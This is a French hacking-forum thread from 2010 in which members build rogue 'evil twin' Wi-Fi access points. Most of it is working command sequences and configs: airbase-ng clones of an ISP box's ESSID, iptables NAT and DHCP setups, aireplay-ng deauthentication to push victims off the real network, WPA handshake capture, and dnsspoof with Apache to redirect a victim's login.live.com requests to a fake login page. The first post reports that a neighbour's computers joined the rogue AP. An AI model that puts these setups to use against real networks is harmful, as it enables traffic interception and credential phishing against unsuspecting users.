Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 10-09-2010 17:00:22

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Rogue AP étrange

Bonjour donc voila je viens vous donner quelque indications concernant un rogue AP que j'ai fais ou des ordinateurs n'étant pas de ma connexion c'étaient connecté a mon rogue.

J'utilise une livebox en WPA2 et mon voisin une freebox en WPA TKIP.

Une carte alpha pour mon rogue et la carte interne de mon ordinateur(une atheros) pour la connexion internet.

J'ai 2 pc un sous win7 et l'autre sous linux.

en utilisant ce code

airbase-ng -P -C 30 -c 6 -e LiveBox-XXXX -v $mon0

j'attends une petit moment et je vois mon pc sous win qui se connecte sans probleme et la surprise les pc du voisin(il en a 2 apparement aussi) se connecte sur ma rogue au bout d'une dizaines de seconde.

Dans la fenetre airodump on aperçois dans la rangée ESSID

                                                          LiveBox-XXXX,freeboxXXXX

Le 2e essid clignote pourquoi?j'ai toujours pas compris.

Pour info je capte aussi bien mon réseau que celui du voisin c'est a dire a 5 barres.

Quand je fais:
airbase-ng -c 6 -e LiveBox-XXXX -z 2 -W 1 mon0

là seul mon pc win7 se connecte.

perso je pense que c'est un bug vu que les 2 box sont a 5 barres de signal.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 23-09-2010 22:33:27

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP étrange

Je ne fais pas de new topic pour ce qui va suivre vu que sa concerne le rogue AP^^

En se moment je travaille sur de l'open et je tente d'adapter les rogue AP qui fonctionnent de mon bactrack sur mon unbutu 9.10 mais sa pose quelque probleme.

Voila mes commandes:

modprobe tun
airbase-ng -e "wifidecyril" -v mon0

ifconfig lo up
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 iptables -P FORWARD ACCEPT
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
/etc/init.d/dhcp3-server restart

l'erreur intervient suite a cette commande:
iptables --table nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1 iptables -P FORWARD ACCEPT
Bad argument `iptables'
Try `iptables -h' or 'iptables --help' for more information.

C'est embétant car sa marche nikel sous bt donc quelle variable faudrait t-il que je change pour que sa fonctionne sur mon unbutu?

Merci de m'aider:)

Hors Ligne

#3 25-09-2010 14:58:59

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP étrange

Bonjour,

Mon problème de rogue AP sous unbutu 9.10 et résolu.
Voici les commandes a rentré(pour les gens qui ne veulent pas mettre un livecd de bactrack a chaque teste de son réseau...)

Pour que la rogue transparente marche wlan0 doit etre connecté avant sur un autre réseau.(dans mon cas une atheros)

airmon-ng start wlan0
modprobetun
airodump-ng -c 6 mon0
airbase-ng -c 6 -e RÉSEAU -a BSSID mon0

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
ptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 192.168.1.1
iptables --table nat --append POSTROUTING --out-interface wlan1 -j MASQUERADE
iptables --append FORWARD --in-interface mon0 -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
/etc/init.d/dhcp3-server restart

Pour unbutu vérifiez que le dhcp3-server soit installé:
"apt-get install dhcp3-server"

editez votre fichier dhcp.conf:
"gedit /etc//dhcp3/dhcpd.conf"

Et paramétrez le en fonction de l'ip de votre routeur.

Voila en espérant que sa aide.:)

Hors Ligne

#4 25-09-2010 22:17:26

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP étrange

Maintenant que je sais faire un rogue sur de l'open sur unbutu(et je pense que je suis pas le seul)je vais me lancer pour tenter de crée un fake AP en WPA/2 sur unbutu correspondant au critère de ma box.

J'ai fait quelque test et sa ma l'air assez difficile voila la commande que j'ai tapé et qui n'a pas marché:

airbase-ng -c 6 -e ESSID -a BSSID -Z 4 mon0 sur mon netbook equipé de win7 je vois mon réseau avec une croix rouge(peut-etre pour faire jolie:))quand je tente de m'y connecté s'a maffiche "les parametres enregistré sur cette ordinateur ne sont pas configurés pour se connecter a ce réseau"

Airbase et un outil puissant il y a forcément une commande qui passe,ça marche sur de l'open mais il y a des options pour le WPA c'est pas pour rien non?

Voyons voir si on réfléchi un peu en regardant airbase-ng on s'aperçoit qu'il y a des options du genre:

-V type          : fake EAPOL 1=MD5 2=SHA1 3=auto
ou
-0                 : set all WPA,WEP,open tags. can't be used with -z & -Z
ou encore
-h MAC          : source mac for MITM mode

Ce qui m'amene a penser en 1er temps que pour le WPA tkip on pourrai peut etre utilier airbase avec l'option -V et -h inscrite quelque part dans la ou les commandes(une commande pour le fake AP et une autre pour utiliser l'option -h et -V par exemple)couplé de tkiptun-ng...mais reste a réussir de faire connecté le client et a testé si c'est vraiment faisable.

pour le WPA/2 sa m'a lair plus dur mais procédons par ordre une avancé sur le WPA/TKIP serait considérable.

Si vous voulez mon avis airbase-ng ne sert pas uniquement a crée des AP bidons il y a d'autre options que j'aimerais testé,cependant si vous avez des idées je suis preneur.

Hors Ligne

#5 25-09-2010 22:42:36

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP étrange

Avant que tu ne t'aventures sur ce terrain plein de frustration et de migraines, voilà où j'en suis arrivé après un essai similaire smile
- l'option "-h" (ou plus exactement l'option -M qui est obligatoire avec -h) n'est pas encore implémentée, cfr. [c]man airbase-ng[/c] ou le site officiel --> airbase-ng [aircrack-ng.org]
- tkiptun-ng n'est pas encore utilisable, ou du moins pas que je sache, si tu as un plan précis pour t'en servir je serais curieux d'y jeter un œil smile

La croix rouge et l'histoire des paramètres, je pense que c'est parce que tu n'as pas exactement les mêmes réglages que ton réseau légitime. WPA2 au lieu de WPA, AES au lieu de TKIP,... En jouant bien avec les options -V et -Z tu devrais arriver à avoir le bonne combinaison et tromper ta victime smile

Pour le reste, effectivement ces options WPA m'ont intrigué tout un temps. Je pense qu'elles sont surtout là pour donner l'illusion à la victime que le réseau est celui qu'elle croit (en mettant les bons flags dans les beacons & probes), mais tu ne peux pas t'en servir pour créer un "vrai" réseau WPA, puisque tu ne connais pas la clé hmm
Le seul cas où ces options WPA sont utiles, c'est pour choper un handshake : tu attends que la victime se connecte, tu lui envoies un challenge et elle te le renvoie chiffré (procédure normale). Tu te retrouves avec un 4-way handshake, que tu peux casser avec Aircrack-ng.

Le problème, après, c'est de créer un "vrai" réseau WPA sans en connaître la clé (puisque tu n'as que le handshake non cracké). Tu ne peux pas facilement en déduire la PMK, et commencer à chiffrer tout le trafic entre ta rogue et ta victime avec la "bonne" clé. Donc il y a toujours un moment où ca va coincer, parce que ta victime s'attend à avoir du trafic chiffré, et avec sa clé qui plus est sad
L'idéal serait d'accepter le handshake normalement, puis de transformer silencieusement ta rogue en réseau OPN (=> plus besoin de chiffrer), sans que la victime s'en rende compte (et ca c'est tout le sport), mais là pour l'instant je ne vois pas trop comment faire hmm

Hors Ligne

#6 26-09-2010 00:35:13

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP étrange

Merci pour ces précision antares smile

Je n'ai pas vraiment d'idée pour utiliser tkiptun-ng a part peut-etre modifié 2 3 truc dedans mais sa me semble compliqué.

Pour l'instant je tente toujours de faire connecté mon netbook a ma box en WPA/2 et voila ce que sa donne:
1er éssai

airbase-ng -c 6 -e Livebox-xxxx -a bssid -0 mon0
00:11:27  Created tap interface at0
00:11:27  Trying to set MTU on at0 to 1500
00:11:27  Trying to set MTU on mon0 to 1800
00:11:27  Access Point with BSSID xxxx started.
00:12:38  Client 00:C0:CA:35:D1:B7 associated (WPA2;CCMP) to ESSID: "Livebox-xxxx"
00:12:38  Got WPA handshake from 00:C0:CA:35:D1:B7
00:12:41  Client 00:C0:CA:35:D1:B7 associated (WPA2;CCMP) to ESSID: "Livebox-xxxx"

je peux surfer sur internet mais sa coupe presque aussitot

second:

[email protected]:~# modprobe tun
[email protected]:~# airbase-ng -c 6 -e Livebox-xxxx -a bssid -0 mon0
00:17:02  Created tap interface at0
00:17:02  Trying to set MTU on at0 to 1500
00:17:02  Access Point with BSSID xxxx started.

La il ne se passe rien et win7 m'affiche impossible de me connecter.(pourtant c'est la meme commande)

3e

[email protected]:~# modprobe tun
[email protected]:~# airbase-ng -c 6 -e Livebox-xxxx -a bssid -0 -s mon0
00:23:27  Created tap interface at0
00:23:27  Trying to set MTU on at0 to 1500
00:23:27  Access Point with BSSID xxxx started.
00:24:07  Client 00:C0:CA:35:D1:B7 associated (WPA2;CCMP) to ESSID: "Livebox-xxxx"
00:24:07  Got WPA handshake from 00:C0:CA:35:D1:B7
00:24:07  Got WPA handshake from 00:C0:CA:35:D1:B7

Je me connecte et hop sa me deconnecte aussitot (remarque qu'avec l'option -s la capture du handshake et très rapide)

Je continue mais teste car je sens que je ne suis pas très loin,le plus dur sera comme tu l'as dis passer la rogue en open sans attirer l'attention.

Hors Ligne

#7 26-09-2010 02:02:47

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP étrange

Bon alors j'ai tenté de bidouiller airbase sans succés sauf pour ma derniere commande:

airbase-ng -P -C 30 -c 6 -e Livebox-xxxx -a 0c:60:75:00:6f:fc -0 mon0 (0c:60:75:00:6f:fc)correspond a wlan0 qui sert de rogue AP

contrairement aux autres commandes que j'ai testé avec celle-ci j'ai une adresse IP et je peux(quand il veut bien)surfer sur internet,le problème c'est qui se reconnecte sur le vrai AP pour se reconnecté sur le fake(a savoir 0c:60:75:00:6f:fc)et il fait sa sans discontinuer ce qui ne me laisse pas le temps de vérifier réelement si la connexion internet via mon fake marche réelement.

Est ce qu'en floodant l'ap réel sa pourrai résoudre le problème?
ou alors peut etre un truc dans mon dhcp.conf qui bloque?
(il et configurer pour de l'open)

Je reprend les tests plus tard je suis fatigué et c'est pas en une soirée que je trouverai le problème je pense lol je vais dormir maintenant smile

Hors Ligne

#8 26-09-2010 17:10:24

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP étrange

Bonjour, bonjour,

j'ai réussi a faire disparaitre la croix rouge qui apparaissait et disparaissait sans cesse,mon fake AP en WPA/2 et bien visible et a remplacer le réel mais impossible de se connecter dessus,je n'ai que le handshake.

la commande pour du WPA/2 en norme wifi g c'est:
airbase-ng -c 6 -e Livebox-xxxx -I 600 -0 mon0

Je précise la norme car avec ces commandes:

airbase-ng -c 6 -e Livebox-xxxx -a bssid -Z 4 -V 2 mon0
airbase-ng -c 6 -e Livebox-xxxx -a bssid -Z 4 -V 3 mon0

On obtient un réseau en norme "n" (pratique si vous avez une des derniere boxs comme les dernière free qui sont en "n" par exemple...)Z étant une option WPA/2 dans airbase il doit comprendre sa comme un des dernier réseau sorti existant.

Bref donc revenons a nos moutons je vois mon réseau mais je ne peut pas me connecter,voici mon dhcp;conf:

ption T150 code 150 = string;
deny client-updates;
one-lease-per-client false;
allow bootp;
ddns-updates off;
ddns-update-style interim;
authoritative;


subnet 192.168.1.1 netmask 255.255.255.1 {
    interface mon0;
range 192.168.1.10 192.168.1.50;
    option subnet-mask 255.255.255.0;
    option routers 192.168.1.1;
    option domain-name-servers 208.67.222.222, 208.67.220.220;
}


Je suis avec unbutu 9.10 et sa marche nikel pour de l'open donc je ne comprend pas pourquoi sa refuse de marché avec un réseau sécurisé,je doit oublier de faire quelque chose mais je ne voit pas vraiment quoi.

Si vous avez des suggestions...

Hors Ligne

#9 26-09-2010 17:37:58

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP étrange

Juste un détail... Utilise la balise "code" pour mettre tes commandes et leur résultat, c'est plus lisible, merci wink

- pour le réseau en type N, ca dépend avec quelle carte tu le fais aussi. Une carte compatible G ne pourra pas imiter le N, même si elle peut induire la victime en erreur en activant tous ses flags tongue
- pour l'impossibilité de t'y connecter, je l'ai dit : à la base le mode WPA d'airbase-ng sert à collecter un handshake. Je ne suis pas sûr qu'il soit prévu de maintenir une connexion une fois que ledit handshake est capté, à cause des raisons dont j'ai parlé plus haut hmm
- est-ce que tu empêches ta victime de se connecter au réseau original ? Sinon, c'est peut-être ca le problème : elle se met sur ton Rogue puis elle reswitche sur le réseau légitime, donc impossible de se connecter.
Tu peux utiliser aireplay-ng -0 pour envoyer des trames de deauth et kicker ta victime (--> Deauthentication [aircrack-ng.org]), même si c'est sans doute plus propre d'utiliser airdrop-ng pour ça (moins facile à mettre en place cependant).

Une fois que ta victime est obligée de s'associer à ton rogue, on pourra voir si le DHCP fonctionne correctement wink

Hors Ligne

#10 26-09-2010 20:11:41

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP étrange

Alors j'ai testé ceci:

-En 1er je deconnecte le client de l'ap réelle via aireplay.(trés peu de temps sa suffit)
-En second j'avais préparé une commande aireplay mais que pour flooder l'ap réel cette fois-ci.
-Ensuite le cllient se connecte avec un accés limité et j'ai une adresse IP(je pense que mon dhcp que j'ai légerement modifier n'est pas en cause mais que comme l'a dit antares c'est peut etre conçu que pour capturer un handshake...)
-Puis mon client se deconnecte et reste bloqué sur connexion le reste du temps...

Conclusion: 1 handshake oui
                 1 connexion potable non.

Ceci dit je pense que c'est possible d'approfondir pour avoir une vrai connexion en WPA/2 sur un fake AP.

Je testerai encore certaine chose en m'aidant de ceci:

--> http://ubuntuforums.org/showthread.php?t=1388108
--> http://doc.ubuntu-fr.org/tutoriel/insta … figuration


En espérant qu'on puisse faire des fake AP en WPA également.

Hors Ligne

#11 26-09-2010 21:09:23

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Rogue AP étrange

Salut

c plus "simple" avec une carte athéros et hostapd http://hostap.epitest.fi/ mais dur a faire fonctionner toujours le dhcp qui fout le bordel

bonne chance

Hors Ligne

#12 26-09-2010 21:23:16

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Rogue AP étrange

atheros avec hostapd (sous debian ect) (à modifier si vous voulez l'ouvrir car ici c'est en WPA)

/etc/network/interfaces :

auto ath0
iface ath0 inet static
    address 10.3.1.1
    netmask 255.255.0.0
    wireless-essid votre-essid
    wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf

/etc/wpa_supplicant/wpa_supplicant.conf :

network={
        ssid="votre-essid"
        #psk="votre-mot-de-passe"
        psk=fe2f5faa7b4f4d47f97ee4e70efa949976f06579ad8d2c1ea3991a7b46ea0a9e
}

/etc/dhcp3/dhcpd.conf :

ddns-update-style none;
option domain-name "tsgri2007.net";
#option domain-name-servers ns1.example.org, ns2.example.org;

default-lease-time 600;
max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;

# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;

# wifi
subnet 10.3.0.0 netmask 255.255.0.0 {
    range 10.3.0.2 10.3.255.254;
    option domain-name-servers 10.3.1.1;
    #  option domain-name "internal.example.org";
    option routers 10.3.1.1;
    option broadcast-address 10.3.255.255;
    default-lease-time 600;
    max-lease-time 7200;
}

/etc/hostapd/hostapd.conf :

interface=ath0
driver=madwifi
logger_syslog=-1
logger_syslog_level=2
logger_stdout=--1
logger_stdout_level=2
debug=0
ctrl_interface_group=0
macaddr_acl=0
#deny_mac_file=/etc/hostapd/hostapd.deny
auth_algs=3
eapol_key_index_workaround=0
eap_server=0
dump_file=/tmp/hostapd.dump
ssid=SMH_WIFI
wpa=3
wpa_psk=fe2f5faa7b4f4d47f97ee4e70efa949976f06579ad8d2c1ea3991a7b46ea0a9e
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP CCMP

Le script de démarrage :

#!/bin/sh

#########################################################################
# Création de la carte ath0 et du point d'accès debian-access-point
echo "Création de la carte ath0 et du point d'accès debian-access-point";

ifconfig ath0 down;
wlanconfig ath0 destroy;
wlanconfig ath0 create wlandev wifi0 wlanmode ap nosbeacon;

echo "Veuillez patienter...";
sleep 1;
echo "Mise en place des options du point d'accès debian-access-point";
iwconfig ath0 key restricted;

echo "Veuillez patienter...";
sleep 2;
echo "Activation de ath0";
ifconfig ath0 10.3.1.1 up;
/usr/sbin/hostapd -B -P /var/run/hostapd.pid -dd -K -t /etc/hostapd/hostapd.conf;

source venant de brico-wifi

Hors Ligne

#13 26-09-2010 22:32:12

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP étrange

Merci de ces précieuses infos veidam;)

Je vais me renseigner et je testerai surement.

Hors Ligne

#14 27-09-2010 09:25:50

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : Rogue AP étrange

Crée un fauw réseau en wpa?
bonne chance mon gars:D

Hors Ligne

#15 29-09-2010 01:04:18

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP étrange

Bonsoir tout le monde^^

J'ai enfin réussi a me connecter en WPA/2 via mon fake AP mais pas avec hostpad grace a ce cher airbase:D

Crée un fauw réseau en wpa?
bonne chance mon gars:D

Eh oui mon cher noob:)

En effet j'ai modifié mon dhcp.conf et sa a marché du premier coup,mon pc sous win7 s'est connecté correctement sans broncher et surtout sans se deconnecter(j'ai laisser tourner wireshark pendant 20mn a peu près en sniffant le réseau de mon netbook)

Pour le matos c'est une carte dwa110(driver rt73)qui m'a servi de rogue.
et pour l'internet une alpha AWUSO36EH(pas vérifier il et tard je suis fatigué mais je crois que c'est la référence exact)(driver rt8187)

Quand au mini PC connecté,une carte atheros.

La commande:

airbase-ng -c CANAL -e RÉSEAUWIFI -a BSSID mon0

J'ai complété ces paramètres la par rapport a l'ap réel et en suivant j'ai lancé les configuration pour les iptables.
Remarque:sous windows une croix rouge apparait par intermitence un réseau ouvert du meme non que l'ap réel mais j'ai bien vérifier sur mon mini netbook par route print et IPCONFIG/ALL que tout correspondait bien a ma rogue sur le fake AP en wpa.
Quel bonheur de voir sa sans mauvaise surprise derrière:D:

00:07:46  Client C4:17:FE:80:D4:86 associated (WPA2;CCMP) to ESSID: "Livebox-xxxx"

Testez chez vous et dites moi si sa marche pour vous car je suis moi meme assez surpris,quand je teste des choses mon pc attaquant se trouve toujours a a peu près 1 mètre de l'autre peut etre que c'est pour sa que j'ai pas eut de problème et que la connexion a été rapide.

Ma question et donc maintenant que c'est possible de connecté du WPA qu'est ce qu'on peut bien en faire?
C'est pas les idées qui me manquent mais en temps "normal" si un hacker arrive a faire sa,tout ce qui reçoit reste crypté(donc inutilisable)il faudrait étudier plusieurs pistes.

Hors Ligne

#16 29-09-2010 13:51:34

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP étrange

Salut !

Bien joué pour l'hostapd, on a trop tendance à l'oublier pour mettre un AP en place smile Par contre, un détail m'intrigue : qu'est-ce que tu as donné comme clé WPA dans le fichier de configuration ? La même que celle de la Livebox ? Parce que dans ce cas-là, tu ne peux pas utiliser le rogue AP pour récupérer la clé, vu que tu es déjà sensé la connaître tongue

Si le but est seulement de faire un MITM "automatique" tu ne gagnes pas grand chose par rapport à un empoisonnement ARP (qui est moins "joli" techniquement, mais tout aussi efficace) wink

Hors Ligne

#17 29-09-2010 19:15:25

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP étrange

Salut a tous,alors concernant les fichiers servant a faire la rogue j'ai modifié:

gedit etc/network/interfaces
gedit /etc/wpa_supplicant/wpa_supplicant.conf
gedit /etc/dhcp3/dhcpd.conf
gedit /etc/hostapd/hostapd.conf

Et evidement mon fichier dchp

Concernant la clé voila mon fichier wpa_supliant.conf:

network={
        ssid="Livebox-xxxx"
        #psk="votre-mot-de-passe"
        psk=xxxx...
}

Maintenant la question et comment utiliser la rogue pour une récupe de clé WPA,car si je ne connais pas la clé c'est crypté,il faudrait que je teste sans avoir la clé dès le départ.

Le probleme c'est que le client s'attend a une "conversation" crypté venant de l'AP or si a la base on a pas la clé la conversation ne pourra pas se faire je me trompe?

Hors Ligne

#18 29-09-2010 21:48:15

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP étrange

C'est bien le problème pour faire un RogueAP en WPA : la victime s'attend à un trafic chiffré, que tu ne peux pas assurer sans connaître la clé. Et le mécanisme de challenge/réponse ne permet pas de récupérer la clé (sinon ca serait beaucoup plus facile big_smile).
L'idéal serait qu'airbase-ng, sur base du handshake qu'il capture, en déduise la PMK pour chiffrer toute la suite de l'échange, mais ca ne marche pas comme ca sad Et donc la technique que tu as brillamment mise en œuvre ici n'est pas applicable à la récupération de la clé (comme je le craignais hmm).

Comme je l'ai dit plus haut, la seule "solution" serait de forcer le client à se connecter sur un réseau OPN sans qu'il s'en rende compte, mais ca c'est assez chaud... C'est d'ailleurs ce qui bloque actuellement pour le projet GTPWA wink

Hors Ligne

#19 29-09-2010 22:20:39

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : Rogue AP étrange

oui je n'avais pas saisie le but mais le mieux c de l'open un scénario et un peu de social engineering mais bon j'ai pas tester mais je pense que ça peut le faire si on est motivé

Hors Ligne

#20 30-09-2010 09:10:44

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP étrange

Le but n'est que pur défi;)

Hors Ligne

#21 24-10-2010 15:57:03

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP étrange

Bonjour,

Pour ne pas faire de la polution de topic je reprend celui-ci pour vous expliquer mon problème.

J'ai tenté de faire fonctionner une rogue en local avec dnsspoof et apache2 sur mon unbutu ce matin et ça ne marche pas pour l'instant.

En 1er,oui mon pc victime se connecte bien a mon réseau local mais il obtient une adresse IP en 169...bizarre

En second dnsspoof merde ou c'est moi qui ai fait une erreur de config(plus probable).

Les points positif la rogue fonctionne apache aussi mais pas dnsspoof visiblement.

Voici les commandes que j'ai rentré pour que vous y voyez plus clair:

airbase-ng -c 11 -e Testréseau -a monbssid mon0

Configuration local

ifconfig at0 up ;
ifconfig at0 10.0.0.1 netmask 255.255.255.0 ;
ifconfig at0 mtu 1400 ;
echo -e $ok
echo -n "Démarrage en local" ;
cd / ;
cd etc ;
echo > dhcpd.leases ;
iptables --flush ;
iptables --table nat --flush ;
iptables --delete-chain ;
iptables --table nat --delete-chain ;
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null ;
iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1 ;
iptables -P FORWARD ACCEPT ;
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80 ;
echo -e $ok

Serveur web:

service apache2 start

apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
[Sun Oct 24 15:56:06 2010] [warn] NameVirtualHost *:80 has no VirtualHosts

dnsspoof

dnsspoof -i at0 -f /root/dns.txt

dnsspoof: listening on at0 [udp dst port 53 and not src 10.0.0.1]

mon dnsspoof contient:  10.0.0.1 *.*

Pour ce qui se passe sur mes port:
netstat -ntlp | grep 80 pendant la rogue m'indique:

tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      11722/apache2

netstat -ntlp | grep 53 pendant la rogue m'indique:

tcp        0      0 5.20.6.28:53            0.0.0.0:*               LISTEN      1501/named      
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      1501/named      
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      1501/named      
tcp6       0      0 :::53                   :::*                    LISTEN      1501/named      
tcp6       0      0 ::1:953                 :::*                    LISTEN      1501/named

et enfin mon dhcp.conf:

option T150 code 150 = string;
deny client-updates;
one-lease-per-client false;
allow bootp;
ddns-updates off;
ddns-update-style interim;
authoritative;


subnet 10.0.0.0 netmask 255.255.255.0 {
interface mon0;
range 10.0.0.2 10.0.0.10;
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
allow unknown-clients;

}

Merci de m'aider a comprendre ou j'ai fais une erreur.

Hors Ligne

#22 24-10-2010 16:02:56

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : Rogue AP étrange

koala a écrit :

En 1er,oui mon pc victime se connecte bien a mon réseau local mais il obtient une adresse IP en 169...bizarre

Ne cherche pas plus loin, le problème est là wink Ton DHCP ne travaille pas, donc le client (qui attend qu'on lui donne une IP) se décourage et s'auto-attribue une adresse "bâtarde".

Carto_ a eu le même problème sur ce topic --> Rogue AP : OK sauf internet !
Tant que ton DHCP ne fait pas ce qu'on lui demande, ca ne sert même à rien de s'énerver avec le DNS smile D'ailleurs, tu le lances où/quand, ton dhcp3 ? hmm

[EDIT] Je peux me tromper, mais je crois que dans ton [c]dhcp.conf[/c] c'est l'interface at0 qui est concernée, pas mon0...

Hors Ligne

#23 24-10-2010 18:02:44

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP étrange

Re c'est bon problème résolu au niveau du dhcp mon 2e pc se connecte immédiatement et obtient une adresse Ip tel que: 10.0.0.2 l'erreur été dans mon script et dans mon dhcp ou j'avais précisé mon0 au lieu de at0,et contrairement a ce que je pensais dnsspoof a l'air de fonctionner puisque je reçois des requete dns le problème restant vient d'apache:

service apache2 start
 * Starting web server apache2                                                  
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
[Sun Oct 24 17:52:23 2010] [warn] NameVirtualHost *:80 has no VirtualHosts
[ OK ]

Sur le PC victime j'ai un 404 not found avec écrit en dessous:
the requested url /login srf was not found on this server

Apache2.2.12(Unbutu)server at login.live.com Port 80

Ma fausse page et bien dans /var/www pourtant.

Par ailleurs voila le résultat de la commande dnsspoof -i at0 -f /root/dns.txt

10.0.0.2.61699 > 10.0.0.1.53:  15852+ A? teredo.ipv6.microsoft.com
10.0.0.2.57356 > 10.0.0.1.53:  64861+ A? www.update.microsoft.com
10.0.0.2.49222 > 10.0.0.1.53:  7348+ A? login.live.com
10.0.0.2.62922 > 10.0.0.1.53:  23573+ A? watson.microsoft.com
10.0.0.2.65177 > 10.0.0.1.53:  29703+ A? img.wlxrs.com
10.0.0.2.62347 > 10.0.0.1.53:  3524+ A? css.wlxrs.com
10.0.0.2.58904 > 10.0.0.1.53:  10919+ A? img2.wlxrs.com
10.0.0.2.64081 > 10.0.0.1.53:  61624+ A? loginnet.passport.com
10.0.0.2.49493 > 10.0.0.1.53:  20020+ A? accountservices.msn.com
10.0.0.2.59633 > 10.0.0.1.53:  42473+ A? js.wlxrs.com
10.0.0.2.65445 > 10.0.0.1.53:  57743+ A? signout.msn.com
10.0.0.2.62553 > 10.0.0.1.53:  3178+ A? c.bay.livefilestore.com
10.0.0.2.55630 > 10.0.0.1.53:  20071+ A? directory.services.live.com
10.0.0.2.63833 > 10.0.0.1.53:  35276+ A? linkhelp.clients.google.com
10.0.0.2.52846 > 10.0.0.1.53:  10540+ A? teredo.ipv6.microsoft.com

Si je ne me trompe pas le problème vient d'apache non?

Hors Ligne

#24 24-10-2010 18:04:10

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Rogue AP étrange

Ps: la carte me servant de rogue et une alpha AWUSO36EH

Hors Ligne

#25 24-10-2010 22:50:58

ThenOOb
Membre Hyperactif
Inscription : 27-09-2010
Messages : 57

Re : Rogue AP étrange

Moi c'est pas mieux apache marche pas du tout...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
106 2189 28-11-2016 19:42:10 par koala
35 1838 23-11-2016 16:31:33 par roofnat
16 1047 17-11-2016 12:22:00 par disquette
10 434 11-11-2016 22:11:03 par koala
[ Projet Rogue AP ] par shirocen
16 453 19-10-2016 05:14:45 par shirocen

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.043 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]